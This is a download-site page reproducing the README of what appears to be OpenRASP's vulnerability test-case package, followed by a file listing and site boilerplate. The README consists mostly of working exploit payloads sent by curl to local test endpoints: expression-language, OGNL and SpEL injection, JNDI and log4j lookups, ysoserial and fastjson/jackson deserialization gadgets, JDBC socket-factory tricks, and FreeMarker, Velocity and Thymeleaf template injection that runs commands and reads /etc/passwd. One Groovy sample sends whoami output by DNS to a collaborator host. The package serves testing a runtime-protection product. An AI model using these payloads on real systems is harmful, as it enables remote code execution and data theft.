### 脚本执行
#### ScriptEngineManager
```bash
curl 127.0.0.1:8080/script/javascript -d 'expression=java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### EL
```bash
curl 127.0.0.1:8080/el/parse -d 'expression=Runtime.getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### groovy
接口
```bash
curl 127.0.0.1:8080/groovy/parse -H "Content-Type: text/plain" --data-binary @script.vy
curl 127.0.0.1:8080/groovy/parseClass -H "Content-Type: text/plain" --data-binary @script.vy
curl 127.0.0.1:8080/groovy/evaluate -H "Content-Type: text/plain" --data-binary @script.vy
```
测试脚本 - AST
```groovy
@groovy.transform.ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app")
})
def x
```
测试脚本 - 需要联网
```groovy
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{}
print new ProcBuilder("open /System/Applications/Calculator.app").run().getOutputString()
```
测试脚本 - 需要联网
```groovy
@GrabConfig(disableChecksums=true)
@GrabResolver(name='payload', root='http://127.0.0.1')
@Grab(group='package', module='payload', version='1')
import Payload;
```
log4j
```groovy
import org.apache.logging.log4j.*;
Logger logger = LogManager.getLogger(getClass());
logger.info ('a={}', '${jndi:ldap://127.0.0.1:1389/a}');
```
[dnslog + 结果上报](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/)
```groovy
import groovy.*;
@groovy.transform.ASTTest(value={
cmd = "whoami";
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".XXXXX.burpcollaborator.net";
java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
})
def x
```
#### ognl
普通执行
```bash
curl 127.0.0.1:8080/ognl/parse -d 'expression=#a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"open", "/System/Applications/Calculator.app/"})).start()'
```
执行JS脚本
```bash
curl 127.0.0.1:8080/ognl/parse -d 'expression=""["getClass"].forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\"open /\")")'
```
#### spel
普通执行
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=T(java.lang.Runtime).getRuntime().exec("open /System/Applications/Calculator.app")'
```
读取输出: 用getErrorStream()读取stderr
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("bash", "-c", "whoami").start().getInputStream(), "utf8")).readLine()'
```
class加载
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=T(org.springframework.cglib.core.ReflectUtils).defineClass("Foo",T(org.springframework.util.Base64Utils).decodeFromString("XXX"),new+javax.management.loading.MLet(new+java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()'
```
RMI
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=new+javax.management.remote.rmi.RMIConnector(new javax.management.remote.JMXServiceURL("service:jmx:rmi://127.0.0.1:1389/jndi/ldap://127.0.0.1:1389/Basic/Command/Calc"),new java.util.Hashtable()).connect()'
curl 127.0.0.1:8080/spel/parse -d 'expression=T(java.lang.System).setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true") %2B new javax.management.remote.rmi.RMIConnector(new javax.management.remote.JMXServiceURL("service:jmx:rmi://127.0.0.1:1389/jndi/ldap://127.0.0.1:1389/Basic/Command/Calc"), new java.util.Hashtable()).connect()'
```
#### mvel
```bash
curl 127.0.0.1:8080/mvel/parse -d 'expression=Runtime.getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### QLExpress
```bash
curl 127.0.0.1:8080/qlexpress/parse -d 'expression=555-333'
```
### 反序列化
#### JDBC
socket factory
```bash
curl 127.0.0.1:8080/drivermanager/connect -d 'url=jdbc:postgresql://localhost:5432/testdb?socketFactory%3dorg.springframework.context.support.ClassPathXmlApplicationContext%26socketFactoryArg=http://127.0.0.1:8000/bean-exec.xml'
```
ssl factory
```bash
echo S | ncat -l -vv -p 5432
curl 127.0.0.1:8080/drivermanager/connect -d 'url=jdbc:postgresql://localhost:5432/testdb?sslfactory%3dorg.springframework.context.support.FileSystemXmlApplicationContext%26sslfactoryarg=http://127.0.0.1:8000/bean-exec.xml'
```
#### readObject()
```bash
ysoserial CommonsCollections6 "open /System/Applications/Calculator.app" > test
curl 127.0.0.1:8080/object/parse --data-binary @test -H 'Content-Type: text/plain'
rm -f test
```
#### fastjson
```
curl 127.0.0.1:8080/fastjson/parse -d 'json={"@type":"org.apache.commons.proxy.provider.remoting.RmiProvider","host":"127.0.0.1",port:"1099","name":"Exploit"}'
curl 127.0.0.1:8080/fastjson/parse -d 'json={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/Exploit","autoCommit":true}'
# 语法兼容性测试
curl 127.0.0.1:8080/fastjson/parse -d 'json={,,,,"user":"123",,,,,"111":222}'
```
#### jackson
```
curl 127.0.0.1:8080/jackson/parse -d 'json=["com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"ldap://127.0.0.1:1389/Exploit"}]'
```
#### xstream
```
curl 127.0.0.1:8080/xstream/parse -H 'Content-Type: text/xml' -d @test.xml
```
#### xmldecoder
```
curl 127.0.0.1:8080/xmldecoder/parse -H 'Content-Type: text/xml' -d @test.xml
```
#### jodd-json
```
curl 127.0.0.1:8080/jodd/parse -d 'type=com.mchange.v2.c3p0.JndiRefForwardingDataSource&json={"jndiName":"ldap://127.0.0.1:1389/Exploit","loginTimeout":0}'
```
### 模板渲染
#### velocity
```
curl 127.0.0.1:8080/velocity/eval -d 'username=#set($exp%3d"");$exp.getClass().forName("java.lang.Runtime").getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### freemarker
JythonRuntime需要本地有class: https://tttang.com/archive/1412/
```
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value%3d"freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("open /System/Applications/Calculator.app")</@value>'
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value%3d"freemarker.template.utility.Execute"?new()>$${value("open /System/Applications/Calculator.app")}'
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=${"freemarker.template.utility.Execute"?new()("open /System/Applications/Calculator.app")}'
```
eval模式
```
curl 127.0.0.1:8080/freemarker/eval -d 'username="freemarker.template.utility.Execute"?new()("open /System/Applications/Calculator.app")'
```
写文件
```
curl 127.0.0.1:8080/freemarker/eval -d 'username="freemarker.template.utility.ObjectConstructor"?new()("java.io.FileWriter","/tmp/test.txt").append("123").close()'
```
执行命令
```
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","open","/System/Applications/Calculator.app").start()}'
```
读文件
```
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign+value="freemarker.template.utility.ObjectConstructor"?new()("java.io.FileReader", "/etc/passwd")>${"freemarker.template.utility.ObjectConstructor"?new()("java.util.Scanner", value).next()}'
```
执行SPEL
```
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("T(java.lang.Runtime).getRuntime().exec(\"open /System/Applications/Calculator.app\")").getValue()}'
```
#### thymeleaf模板注入
https://github.com/veracode-research/spring-view-manipulation
```
curl 'http://127.0.0.1:8080/thymeleaf/path?lang=__%24%7BT(java.lang.Runtime).getRuntime().exec(%27%6F%70%65%6E%20%2F%53%79%73%74%65%6D%2F%41%70%70%6C%69%63%61%74%69%6F%6E%73%2F%43%61%6C%63%75%6C%61%74%6F%72%2E%61%70%70%27)%7D__::
没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
收起资源包目录
OpenRASP_漏洞测试环境_openrasp-testcases.zip (340个子文件)
bootstrap.min.css 118KB
bootstrap.min.css 118KB
index.ftl 539B
.gitignore 821B
.gitignore 821B
.gitignore 821B
.gitignore 821B
.gitignore 821B
.gitignore 821B
.gitignore 821B
.gitignore 821B
.gitignore 821B
.gitignore 296B
.gitignore 30B
.gitignore 7B
.gitignore 6B
index.html 3KB
index.html 483B
index.html 389B
freemarker.iml 1KB
main1.iml 947B
main1.iml 947B
fastjson.iml 867B
db2jcc4.jar 3.68MB
ojdbc14-10.2.0.2.0.jar 1.47MB
wxpay-sdk-3.0.9.jar 1.41MB
BaseSqlServlet.java 4KB
JDNI.java 4KB
Deserialization.java 3KB
Xxe_sax.java 2KB
UserService.java 2KB
Mysql.java 2KB
DNS.java 2KB
FreeMarkerController.java 2KB
MysqlPrepared.java 2KB
GroovyController.java 2KB
WriteFile.java 2KB
Test.java 2KB
Test.java 2KB
Poc.java 2KB
Directory1.java 2KB
CommandEcho.java 2KB
Multipart_mysql.java 2KB
HttpClient.java 2KB
WebMvcConfig.java 2KB
Poc.java 2KB
Xxe_stax.java 2KB
FileUpload.java 2KB
HttpURLConnection.java 2KB
SerializeToFlatFile.java 2KB
SerializeToFlatFile.java 2KB
Xxe_dom.java 2KB
CommonsFileUploadServlet.java 1KB
SqlException.java 1KB
SqlAccess.java 1KB
UserController.java 1KB
MybatisController.java 1KB
HttpCommonClient.java 1KB
Xxe_dom4j.java 1KB
Directory2.java 1KB
Xxe_jdom.java 1KB
SpelController.java 1KB
FileUploadServlet.java 1KB
VelocityController.java 1KB
ReadFile.java 1KB
OkHttp.java 1KB
SqlPolicy.java 1KB
OkHttp3.java 1KB
Poc.java 1KB
DemoApplication.java 1KB
JNDITask.java 1KB
Log.java 1KB
JoddController.java 1KB
FMServlet.java 1KB
JNDIBadTask.java 991B
Ognl.java 977B
MssqlServlet.java 959B
DNSTask.java 949B
FastJsonServlet.java 945B
PermissionInterceptor.java 940B
QLExpressController.java 918B
Body_Xss.java 908B
Command.java 906B
SqliteServlet.java 903B
BeanController.java 877B
Person.java 777B
Person.java 777B
WebSocketHandler.java 766B
Log4jController.java 762B
RegistryController.java 761B
OgnlController.java 748B
ReflectController.java 734B
FileUploadController.java 731B
ScriptEngineManagerController.java 728B
DB2Servlet.java 720B
App.java 705B
JacksonServlet.java 702B
FastJsonServlet.java 701B
JacksonController.java 690B
EmployeeMapper.java 683B
共 340 条
- 1
- 2
- 3
- 4
资源评论
好家伙VCC
- 粉丝: 1713
- 资源: 7968
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 基于Python语言的Struts2漏洞扫描工具设计源码
- 基于CSS、HTML和JavaScript技术的婚纱网站页面设计源码
- win10玩游戏打开过场动画,提示找不到vids:cvid解压缩程序
- 基于HTML和JavaScript的小越小学网页设计源码
- 美萍会员管理系统标准版2021v1
- 基于Vue框架的uniapp前端设计源码
- 基于Vue的Java、JavaScript、HTML整合的家庭理财管理系统设计源码
- 美萍化妆品销售管理系统标准版2021v1
- 基于JavaScript的贝壳二手房/新房交互式命令行爬虫设计源码
- 基于Emacs Application Framework的Python与Vue/JavaScript双语言文件管理器设计源码
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功